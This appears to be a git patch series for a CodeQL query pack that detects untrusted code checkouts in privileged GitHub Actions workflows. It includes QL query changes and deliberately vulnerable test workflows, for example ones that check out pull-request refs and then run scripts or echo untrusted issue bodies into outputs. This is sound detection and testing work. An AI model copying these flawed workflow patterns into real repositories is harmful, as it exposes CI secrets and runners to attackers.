.github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 42d4bb577c84d021f2cca923552f647f9288ff0f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 22:42:11 +0200 Subject: [PATCH 0609/1267] Better identification of checkout of untrusted code depending on the triggering events --- .../codeql/actions/dataflow/FlowSources.qll | 6 +- .../security/OutputClobberingQuery.qll | 3 +- .../actions/security/PoisonableSteps.qll | 7 +- .../security/UntrustedCheckoutQuery.qll | 227 ++++++++---------- .../CWE-829/UntrustedCheckoutCritical.ql | 1 + .../CWE-829/.github/workflows/test21.yml | 27 +++ .../CWE-829/.github/workflows/test22.yml | 62 +++++ .../CWE-829/.github/workflows/test23.yml | 47 ++++ .../UntrustedCheckoutCritical.expected | 3 + .../CWE-829/UntrustedCheckoutHigh.expected | 4 - .../CWE-829/UntrustedCheckoutMedium.expected | 7 - 11 files changed, 250 insertions(+), 144 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test21.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 56c901434ce..e0d46c7196d 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -90,7 +90,8 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { checkout = uses and uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") + not uses.getArgument("ref").matches("%base%") and + uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() ) or checkout instanceof GitMutableRefCheckout @@ -237,7 +238,8 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { this.asExpr() = uses and uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") + not uses.getArgument("ref").matches("%base%") and + uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() ) or this.asExpr() instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 311c3abdb69..5850aa91e6e 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -29,7 +29,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { step = uses and uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and - not uses.getArgument("ref").matches("%base%") + not uses.getArgument("ref").matches("%base%") and + uses.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() ) or step instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 99d844bae79..d446c446641 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -17,12 +17,13 @@ class PoisonableCommandStep extends PoisonableStep, Run { class JavascriptImportUsesStep extends PoisonableStep, UsesStep { JavascriptImportUsesStep() { - exists(string script, string line, string import_stmt | + exists(string script, string line | this.getCallee() = "actions/github-script" and script = this.getArgument("script") and line = script.splitAt("\n").trim() and - import_stmt = line.regexpCapture(".*await\\s+import\\((.*)\\).*", 1) and - import_stmt.regexpMatch(".*\\bgithub.workspace\\b.*") + // const script = require('${{ github.workspace }}/scripts/test.js'); + // await script({ github, context, core }); + line.regexpMatch(".*(import|require)\\b.*github.workspace\\b.*") ) } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 336afdc73b1..621f4b80e1f 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -3,49 +3,57 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.TaintTracking +string checkoutTriggers() { + result = ["pull_request_target", "workflow_run", "workflow_call", "issue_comment"] +} + /** * A taint-tracking configuration for PR HEAD references flowing * into actions/checkout's ref argument. */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - // remote flow sources - source instanceof ArtifactSource - or - source instanceof GitHubCtxSource - or - source instanceof GitHubEventCtxSource - or - source instanceof GitHubEventJsonSource - or - source instanceof MaDSource - or - // `ref` argument contains the PR id/number or head ref - exists(Expression e | - source.asExpr() = e and - ( - containsHeadRef(e.getExpression()) or - containsPullRequestNumber(e.getExpression()) + source.asExpr().getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and + ( + // remote flow sources + source instanceof ArtifactSource + or + source instanceof GitHubCtxSource + or + source instanceof GitHubEventCtxSource + or + source instanceof GitHubEventJsonSource + or + source instanceof MaDSource + or + // `ref` argument contains the PR id/number or head ref + exists(Expression e | + source.asExpr() = e and + ( + containsHeadRef(e.getExpression()) or + containsPullRequestNumber(e.getExpression()) + ) ) - ) - or - // 3rd party actions returning the PR head ref - exists(StepsExpression e, UsesStep step | - source.asExpr() = e and - e.getStepId() = step.getId() and - ( - step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" - or - step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" - or - step.getCallee() = "alessbell/pull-request-comment-branch" and e.getFieldName() = "head_ref" - or - step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_ref" - or - step.getCallee() = "potiuk/get-workflow-origin" and - e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] - or - step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + or + // 3rd party actions returning the PR head ref + exists(StepsExpression e, UsesStep step | + source.asExpr() = e and + e.getStepId() = step.getId() and + ( + step.getCallee() = "eficode/resolve-pr-refs" and e.getFieldName() = "head_ref" + or + step.getCallee() = "xt0rted/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "alessbell/pull-request-comment-branch" and + e.getFieldName() = "head_ref" + or + step.getCallee() = "gotson/pull-request-comment-branch" and e.getFieldName() = "head_ref" + or + step.getCallee() = "potiuk/get-workflow-origin" and + e.getFieldName() = ["sourceHeadBranch", "pullRequestNumber"] + or + step.getCallee() = "github/branch-deploy" and e.getFieldName() = ["ref", "fork_ref"] + ) ) ) } @@ -71,27 +79,32 @@ module ActionsMutableRefCheckoutFlow = TaintTracking::Global> $GITHUB_OUTPUT + if [[ ${{ github.event.inputs.version }} == 'stable' ]]; then + NEW_VERSION=$(npx semver $OLD_VERSION -i patch) + else + if [[ $OLD_VERSION == *"rc"* ]]; then + NEW_VERSION=$(npx semver $OLD_VERSION -i prerelease) + else + # WordPress version guidelines: If minor is 9, bump major instead. + IFS='.' read -r -a OLD_VERSION_ARRAY <<< "$OLD_VERSION" + if [[ ${OLD_VERSION_ARRAY[1]} == "9" ]]; then + NEW_VERSION="$(npx semver $OLD_VERSION -i major)-rc.1" + else + NEW_VERSION="$(npx semver $OLD_VERSION -i minor)-rc.1" + fi + fi + fi + echo "new_version=${NEW_VERSION}" >> $GITHUB_OUTPUT + IFS='.' read -r -a NEW_VERSION_ARRAY <<< "$NEW_VERSION" + RELEASE_BRANCH="release/${NEW_VERSION_ARRAY[0]}.${NEW_VERSION_ARRAY[1]}" + echo "release_branch=${RELEASE_BRANCH}" >> $GITHUB_OUTPUT + + build: + runs-on: ubuntu-latest + needs: bump-version + if: | + always() && ( + github.event_name == 'pull_request' || + github.event_name == 'workflow_dispatch' || + github.repository == 'test/test' + ) + steps: + - name: Checkout code + uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 + with: + ref: ${{ needs.bump-version.outputs.release_branch || github.ref }} + + - run: ./bin/build-plugin-zip.sh diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml new file mode 100644 index 00000000000..da889dd2ac6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test23.yml @@ -0,0 +1,47 @@ +on: + schedule: + - cron: "0 3 * * 2-6" # Tuesdays - Saturdays, at 3am UTC + workflow_dispatch: + inputs: + pr: + description: "PR Number" + required: false + type: number + release: + types: [ published ] + +jobs: + resolve-required-data: + name: Resolve Required Data + if: ${{ github.repository_owner == 'test' }} + runs-on: ubuntu-latest + outputs: + ref: ${{ steps.script.outputs.ref }} + steps: + - name: Resolve and set checkout and version data to use for release + id: script + uses: actions/github-script@v7 + env: + PR_NUMBER: ${{ github.event.inputs.pr }} + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + script: | + const script = require('${{ github.workspace }}/scripts/publish-resolve-data.js'); + await script({ github, context, core }); + + build: + needs: [ resolve-required-data ] + if: ${{ github.repository_owner == 'test' }} + name: stable + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + repository: ${{ needs.resolve-required-data.outputs.repo }} + ref: ${{ needs.resolve-required-data.outputs.ref }} + + - name: Build + shell: bash + run: | + ./cmd + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 237928fc892..339cd5f6cf4 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -267,6 +267,9 @@ edges | .github/workflows/test18.yml:33:15:36:12 | Run Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | | .github/workflows/test19.yml:16:7:21:4 | Uses Step | .github/workflows/test19.yml:21:7:22:14 | Run Step | | .github/workflows/test20.yml:16:7:21:4 | Uses Step | .github/workflows/test20.yml:21:7:22:14 | Run Step | +| .github/workflows/test21.yml:18:9:25:6 | Uses Step | .github/workflows/test21.yml:25:9:27:36 | Run Step | +| .github/workflows/test22.yml:57:15:62:12 | Uses Step | .github/workflows/test22.yml:62:15:62:45 | Run Step | +| .github/workflows/test23.yml:38:9:43:6 | Uses Step | .github/workflows/test23.yml:43:9:46:16 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected index 13e16280c33..1d6122b3747 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.expected @@ -1,7 +1,3 @@ -| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | -| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | | .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index c81666f72dc..a476bdc22d8 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -1,13 +1,6 @@ -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/artifactpoisoning82.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:15:9:19:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot1.yml:39:9:43:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 0cacb6feaffba0b5317ecb3829d657b3ba89371b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 22 Oct 2024 22:42:51 +0200 Subject: [PATCH 0610/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 867f1bfdb86..404c86d212c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.71 +version: 0.1.72 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index df650d0e242..1296bbd667b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.71 +version: 0.1.72 groups: [actions, queries] suites: codeql-suites extractor: javascript From 0738a66380d8f781114441348d0713c090c30d5a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 09:37:01 +0200 Subject: [PATCH 0611/1267] Add trigger event checks for all checkout models --- .../security/UntrustedCheckoutQuery.qll | 4 + .../CWE-829/.github/workflows/test24.yml | 20 + .../CWE-829/UntrustedCheckoutCritical.actual | 342 ++++++++++++++++++ 3 files changed, 366 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml create mode 100644 ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 621f4b80e1f..ea3f4c3c269 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -283,6 +283,7 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -306,6 +307,7 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( containsHeadSHA(cmd) @@ -326,6 +328,7 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -348,6 +351,7 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | + this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and ( containsHeadSHA(cmd) diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml new file mode 100644 index 00000000000..8502d081a73 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test24.yml @@ -0,0 +1,20 @@ +on: [ workflow_dispatch, pull_request ] +jobs: + test: + runs-on: ubuntu-20.04 + if: github.event_name == 'pull_request' + steps: + - name: Check out repository code + uses: actions/checkout@v2 + + - name: Fetch base and head on PR + if: ${{ github.event.pull_request.base.sha }} + run: | + git fetch origin master ${{ github.event.pull_request.base.sha }} + git fetch origin master ${{ github.event.pull_request.head.sha }} + + - name: Check that Pull Request includes updating the Version + run: | + git show ${{ github.event.pull_request.base.sha }}:src/mplfinance/_version.py > scripts/tv0.py + git show ${{ github.sha }}:src/mplfinance/_version.py > scripts/tv1.py + python scripts/version_update_check.py tv0 tv1 diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual new file mode 100644 index 00000000000..1ed39f73a48 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.actual @@ -0,0 +1,342 @@ +edges +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | +| .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact-2/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact-2/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning92.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | +| .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:26 | Run Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | +| .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:22:40 | Run Step | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | 